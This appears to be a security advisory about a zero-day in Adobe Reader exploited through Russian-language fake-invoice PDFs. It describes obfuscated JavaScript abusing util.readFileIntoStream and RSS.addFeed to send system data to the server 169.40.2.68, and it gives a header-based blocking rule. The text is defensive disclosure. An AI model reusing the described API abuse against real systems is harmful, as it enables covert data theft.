Targeted attacks observed through a zero-day vulnerability in "Adobe Reader"

As a result of the recent research, targeted attacks are being conducted through an as-yet unidentified vulnerability in Adobe Reader. Reports indicate that this zero-day vulnerability has been actively exploited since at least November 2025.

According to available information, the attack is triggered as soon as a specially crafted PDF file is opened. One of the samples identified on VirusTotal, named “Invoice540.pdf”, shows that the attackers are using fake invoices as part of a social engineering to deceive users. One of the most concerning aspects of the campaign is that the exploit is capable of running on the latest version of the software without requiring any further user interaction.

The investigation also revealed that once the file is opened, hidden and heavily obfuscated JavaScript code is executed. This code hijacks two built-in APIs, util.readFileIntoStream and RSS.addFeed. Under normal circumstances, these functions are used for file handling and the management of web updates, however, by abusing them, the attackers are able to secretly extract data from the compromised computer and transmit it to a remote server located at 169.40.2.68.

It is noted that this activity represents only the initial stage of the attack chain. In particular, the collection of system information and the fingerprinting of the device create the dangerous conditions for subsequent stages of the attack chain. These may include Remote Code Execution (RCE), as well as the circumvention of built-in security mechanisms in order to obtain broader control over the affected system

İn this scenario, attackers are primarily conducting operations against specific target groups. Analysis of the malicious documents has shown that these PDF files were prepared in Russian and contain references to news and events related to the Russian oil and gas industry. The purpose of this approach is to make the delivered emails appear legitimate and credible to the recipients.

It should be noted that this is not the first time Adobe Reader has faced security issues of a similar nature. A previous vulnerability, tracked as CVE-2024-41869, had also been identified earlier.

Although the relevant party was notified of the discovered vulnerability, no official security update addressing the issue has been released at this stage. For this reason, users are strongly advised to be extremely cautious when opening PDF files received from unknown sources. At the same time, network administrators of institutions and enterprises are recommended to closely monitor indicators of suspicious traffic and in particular, block internet traffic containing the phrase Adobe Synchronizer in the header to prevent attackers from communicating with infected systems.